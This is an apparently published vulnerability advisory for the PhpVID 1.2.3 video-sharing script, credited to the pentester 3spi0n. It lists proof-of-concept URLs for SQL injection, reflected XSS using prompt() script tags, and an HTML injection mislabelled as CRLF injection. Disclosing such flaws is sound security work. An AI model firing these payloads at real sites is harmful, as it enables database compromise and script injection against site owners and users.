PHPVID 1.2.3 - Multiple Vulnerabilities



EKU-ID: 32799 CVE: OSVDB-96226;CVE-2013-5312;CVE-2013-5311;CVE-2008-4157;CVE-2008-2335;OSVDB-96225;OSVDB-96224;OSVDB-96223;OSVDB-96222;OSVDB-48018;OSVDB-45171 OSVDB-ID:
Author: 3spi0n Published: 2013-08-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


##################################################################################
  _____                 _       _   _                _____
 |  __ \               | |     | | (_)              / ____|
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|

##################################################################################
PhpVID Script, Multiple Vulnerabilities
Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server//browse_videos.php?cat=&n='1

[+] (groups.php, cat Param)
>>> http://server/groups.php?cat='1

[+] (members.php, n Param)
>>> http://server/members.php?browse=recent&n='1

[2] XSS Vulnerability on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt>

[+] (groups.php, cat Param)
>>> http://server//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt>

[+] (search_results.php.php, query Param)
>>> http://server//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt>

[3] CRLF Injection Vulnerability on Demo Site
>>> http://server/search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n</h1></marquee>